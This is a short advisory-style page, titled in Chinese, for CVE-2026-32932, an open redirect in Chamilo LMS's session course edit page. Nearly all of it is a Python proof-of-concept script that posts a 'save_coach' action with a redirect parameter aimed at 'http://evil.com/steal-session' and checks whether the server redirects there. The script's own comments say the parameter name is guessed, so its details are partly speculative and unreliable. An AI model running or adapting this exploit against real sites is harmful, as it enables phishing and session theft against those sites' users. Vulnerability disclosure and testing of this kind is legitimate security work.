CVE-2026-32932 Chamilo LMS开放重定向漏洞

import requests # PoC for CVE-2026-32932: Open Redirect in Chamilo LMS # This script demonstrates the vulnerability by triggering a redirect to an external site. target_url = "http://target-chamilo-instance.com/main/session/session_course_edit.php" attacker_site = "http://evil.com/steal-session" # Payload simulating the save coach assignment action with a malicious redirect parameter # The parameter name might vary (e.g., 'redirect_url', 'return_path') based on implementation payload = { "id_session": "12345", # Valid session ID required for the action "action": "save_coach", "redirect_url": attacker_site } try: # Sending the request as an authenticated administrator (cookie required in real scenario) response = requests.post(target_url, data=payload, allow_redirects=False) if response.status_code in [301, 302, 303]: location = response.headers.get('Location') print(f"[+] Redirect triggered!") print(f"[+] Location: {location}") if attacker_site in location: print("[+] Vulnerability Confirmed: Redirecting to external attacker domain.") else: print("[-] Redirect did not go to the expected external domain.") else: print(f"[-] No redirect triggered. Status code: {response.status_code}") except Exception as e: print(f"Error: {e}")